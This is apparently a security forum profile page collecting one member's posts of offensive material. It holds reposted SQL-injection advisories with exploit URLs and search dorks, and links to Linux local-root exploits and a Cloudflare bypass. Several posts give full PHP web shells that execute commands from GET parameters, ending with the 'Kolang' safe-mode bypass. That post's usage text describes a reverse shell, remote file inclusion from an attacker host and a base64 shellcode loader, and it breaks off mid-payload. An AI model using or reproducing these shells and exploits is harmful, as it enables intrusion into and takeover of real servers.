رفتن به مطلب
شما به عنوان یوزر میهمان وارد شده اید. جهت استفاده از تمامی امکانات لطقا وارد حساب کاربری خود شوید.

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Uzun DZ

Member
  • تعداد ارسال ها

    19
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

درباره Uzun DZ

  • تاریخ تولد ۹۳/۰۲/۰۸

Converted

  • Name
    Uzun
  • Main os
    Linux
  • Programming language
    خیر
  1. Uzun DZ

    Xavier V2.4 Php Mp - Sql Injection Web Vulnerabilities

    https://www.vulnerability-lab.com/get_content.php?id=2076 Document Title: =============== Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2076 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15949 CVE-ID: ======= CVE-2017-15949 Release Date: ============= 2017-06-06 Vulnerability Laboratory ID (VL-ID): ==================================== 2076 Common Vulnerability Scoring System: ==================================== 5.3 Vulnerability Class: ==================== SQL Injection Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page. You can also protect sections of pages. Secure your web pages or sections of content dependant on whether your users are logged in or out, or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator. (Copy of the Homepage: https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application. Vulnerability Disclosure Timeline: ================================== 2017-06-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Siggles Product: Xavier - PHP Login Script & User Management Admin Panel 2.4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple sql-injection vulnerabilities has been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application. The issue allows remote attackers to inject own malicious sql commands to compromise the web-application & database management system. The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuserdit.php` and `editgroup.php` files. Remote attackers with privileged user accounts are able to compromise the web-application and database management system by injection of sql commands via GET method request. The attacker vector is client-side and the request method to inject the sql commands is GET. The vulnerability is a classic order by sql-injection. The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3. Exploitation of the remote sql-injection web vulnerability requires an authenticated web-application user account and no user interaction. Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise. Request Method(s): [+] GET Vulnerable File(s): [+] adminuseredit.php [+] editgroup.php Vulnerable Parameter(s): [+] usertoedit [+] log_id Proof of Concept (PoC): ======================= The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[sql-INJECTION VULNERABILITY!] https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[sql-INJECTION VULNERABILITY!] PoC: Exploitation https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203-- https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203-- --- SQL Error & Exception Logs --- Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'' in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') #1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...') #2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300 - Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') #1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''') #2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300 - Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1' in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace: #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...') #1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'') #2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59 --- PoC Session Logs [GET] --- Status: 200[OK] GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[sql-INJECTION VULNERABILITY!]-- Mime Type[text/html] Request Header: Host[xavier-php.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Cookie[phpSESSID=6b9f9560a6a0d35b12b8603424cf2525] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] Keep-Alive[timeout=2, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html] - 20:49:05.559[216ms][total 277ms] Status: 200[OK] GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[sql-INJECTION VULNERABILITY!]-- Mime Type[text/html] Request Header: Host[xavier-php.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Cookie[phpSESSID=6b9f9560a6a0d35b12b8603424cf2525] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] Keep-Alive[timeout=2, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html] Reference(s): https://xavier-php.localhost:8080/ https://xavier-php.localhost:8080/xavier/ https://xavier-php.localhost:8080/xavier/admin/ https://xavier-php.localhost:8080/xavier/admin/editgroup.php https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php Solution - Fix & Patch: ======================= The vulnerability can be patched by a parse via escape of the vulnerable parameters in the affected php files. Restrict the prameter input and use a prepared statement to secure the functions of the admin panel. Disallow to preview errors in the php code of the panel to prevent attacks. Security Risk: ============== The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3). Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
  2. Uzun DZ

    Joomla Com_jajobboard V1.5 - Sql Injection Vulnerability

    Joomla com_jajobboard v1.5 - SQL Injection Vulnerability Document Title: =============== Joomla com_jajobboard v1.5 - SQL Injection Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2036 Release Date: ============= 2017-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 2036 Common Vulnerability Scoring System: ==================================== 7.1 Product & Service Introduction: =============================== JoomlArt is happy to announce the release JA Job Board for Joomla 2.5, an ultimate Joomla-based recruitment component. It renders an enterprise-level rich-featured, strongly scalable and ease-to-use Job site solution, to help Administrator manages their Job site effectively. (Copy of the Homepage: https://www.joomlart.com/joomla/extensions/ja-jobboard ) Abstract Advisory Information: ============================== An independent vulnerability laboratory partner team researcher discovered a remote sql-injection web vulnerability in the official Joomla CMS JaJob Board v1.5 component. Vulnerability Disclosure Timeline: ================================== 2017-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Joomlart Product: com_jajobboard - Joomla Component (Web-Application) 1.5 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql-injection vulnerability has been discovered in the official Joomla CMS JaJob Board v1.5 component. The issue allows remote attackers to execute own malicious sql commands to compromise the web-application or dbms. The sql-injection vulnerability is located in the `job_tags` and `Itemid` parameters of the `jajobs jalist` module. The request method to execute is GET and the attack vector is client-side. Remote attackers are able to inject own malicious sql commands via vulnerable `job_tags` and `Itemid` parameters to compromise the web-application or dbms. The web vulnerability is a classic sql-injection in the `joomla `com_jajobboard` component. The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.1. Exploitation of the sql-injection vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the web vulnerability results in web-application or database management system compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] jajobs jalist Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] job_tags [+] Itemid Affected Component(s): [+] com_jajobboard (joomla) Proof of Concept (PoC): ======================= The sql-injection web vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Dork(s): inurl:index.php?option=com_jajobboard site:index.php?option=com_jajobboard PoC: Exploitation http://localhost/[JOOMLA_PATH]/index.php?option=com_jajobboard&view=jajobs&layout=jalist&job_tags=[sql-INJECTION VULNERABILITY!]&Itemid=x http://localhost/[JOOMLA_PATH]/index.php?option=com_jajobboard&view=jajobs&layout=jalist&job_tags=x&Itemid=[sql-INJECTION VULNERABILITY!] Reference(s): http://localhost/joomla/ http://localhost/joomla/index.php Solution - Fix & Patch: ======================= The sql-injection web vulnerability can be resolved by a parse and restriction of the vulnerable Itemid und job_tags parameters. Disallow the usage of special chars and use the escape function. Implement a secure prepared statement to resolve the vulnerability. Security Risk: ============== The security risk of the remote sql injection web vulnerability in the web-application plugin is estimated as high. (CVSS 7.1) Credits & Authors: ================== Amir - Iranian Exploit Database (www.iedb.ir) [http://www.vulnerability-lab.com/show.php?user=IEDB%20Team] Thanks: C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost, 1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,Be_lucky,MoslemHaghighian,Dr_Iman,8Bit, Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 ... all my friends and the Iedb Team. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get a ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
  3. Uzun DZ

    Burp Suite V1.7.27 - Remote Code Execution Vulnerability

    Burp Suite v1.7.27 - Remote Code Execution Vulnerability V1.7.27 Vulnerability Class: Code Execution Current Estimated Price: 4.000€ - 5.000€ Exploitation Technique: Remote Severity Level: High Video :
  4. Hi friends we show 3 method for bypass cloud flare security to get real ip address of website : using public website using dig command using websploit http://cloudflare-watch.org.statstool.com/ https://www.youtube.com/watch?v=cQZWPpWMxVA Bypass cloudflare security to get real IP address of website.zip
  5. (Bypass DNS Protector (Cloud flare
  6. Apple iOS v9.0, v9.1 & v9.2.1 - Multiple Pass Code Bypass Vulnerabilities http://www.vulnerability-lab.com/get_content.php?id=1779
  7. http://www.vulnerability-lab.com/get_content.php?id=1596
  8. Hi Guys , we have bypass forbidden error with AnonGhost Shell Script Via Perl Based Symlink Tool : See It https://www.youtube.com/watch?v=1ufal4tFZac https://www.youtube.com/watch?v=1ufal4tFZac
  9. Uzun DZ

    Full Archive 2.6.32 2012-2013 Local root Exploits

    2.6.32 2012-2013 Local root Exploits : Tested On Linux 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64 Linux 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64 Linux 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64 Linux 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64 Linux 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64 Linux 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64 Linux 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64 Linux 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64 Linux 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64 Linux 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64 Linux 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64 Linux 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64 Linux 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64 Linux 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64 Linux 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64 Linux 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64 Linux 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64 Linux 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64 Linux 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64 Linux 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64 Linux 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64 Linux 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64 Linux 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64 Linux 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 Linux 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64 Linux 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64 Linux 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64 Linux 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64 Linux 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64 Linux 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64 Linux 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64 Linux 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64 Linux 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux Linux 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 Linux 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64 Linux 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64 Linux 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64 Linux 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64 Linux 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64 Linux 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64 Linux 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64 Linux 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64 Linux 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64 Linux 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64 Linux 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64 Linux 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 : Link http://www.uppic.com/uploads/14401562601.rar
  10. PHP Perl Extension Safe_mode Bypass <?php if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS; if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls '; $perl=new perl(); echo "<textarea rows='25' cols='75'>"; $perl->eval("system('".$_GET['cmd']."')"); echo "</textarea>"; $_GET['cmd']=htmlspecialchars($_GET['cmd']); echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>" ?>
  11. PHP FFI Extension Safe_mode Bypass Exploit <?php if(!extension_loaded('ffi')) die('ERROR: FFI extension is not loaded!'); $command=(empty($_GET['cmd']))?'dir':$_GET['cmd']; if(is_writeable(dirname(__FILE__)))$tmp=dirname(__ FILE__); elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path'); elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir'); else die('ERROR: Move exploit to writeable folder.'); $output="$tmp\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$output\"",0); while(!file_exists($output))sleep(1); $con=''; $fp=fopen($output,'r'); while(!feof($fp))$con.=fgets($fp,1024); fclose($fp); $con=htmlspecialchars($con); echo "<pre>$con</pre>"; unlink($output); ?>
  12. (Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0 <?php /* Kolang (PHP Safe mode bypass) (IHSteam priv8 for lazy penetration testers) (php 4.3.10 - 5.3.0) [url]http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018[/url] (12/19/2009) [url]http://www.milw0rm.com/exploits/7393[/url] (12/09/2008) 1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required) 2- Kolang can execute arbitrary shellcode (just for fans of metasploit ) ~~~~ How to use:) for linux: kolang.php?os=linux&host=LHOST&port=LPORT or kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE for freebsd: kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE file inclusion : [url]http://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT[/url] [url]http://localhost/kolang.php?host=localhost&port=2121[/url] [email protected] ~ $ nc -vv -l -p 2121 listening on [any] 2121 ... connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526 id uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup) Hamid Ebadi [url]http://www.bugtraq.ir[/url] contact : ebadi~bugtraq~ir Kolang means pickaxe (the idea came from amnafzar naming convention) (Separ, Sarand, Alak, Skort) */ $port= intval($_REQUEST['port']); $host= $_REQUEST['host']; $os= $_REQUEST['os']; /* //compile : cc -o shellcode.so -fPIC -shared shellcode.c // //<?php //$data=file_get_contents('shellcode.so'); //file_put_contents('shellcode_base64.txt',$data); //?> // "shellcode loader" : load and execute arbitrary shellcode from a file // Hamid Ebadi #define O_RDONLY 00 ; fcntl.h #define SHELLCODE_MAX_SIZE 1024 // change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp' #define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM" void getuid() { unsetenv("LD_PRELOAD"); //not really necessary, we can remove it int fd; char shellcode[sHELLCODE_MAX_SIZE]; char filename[]=SHELLCODE_FILENAME ; // we can also pass the shellcode in program's arguments if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) { exit(1); } if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){ exit(1); } (*(void(*)()) shellcode)(); } */ if ($_REQUEST['os']=='freebsd'){ // freebsd shellcode loader (x86) $shellcode_loader= "f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA 0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8 GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo EAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ//// /6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1 WIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw AAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD OAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN g/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v// UOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5 CoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+/// /9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0 W17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z dHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA 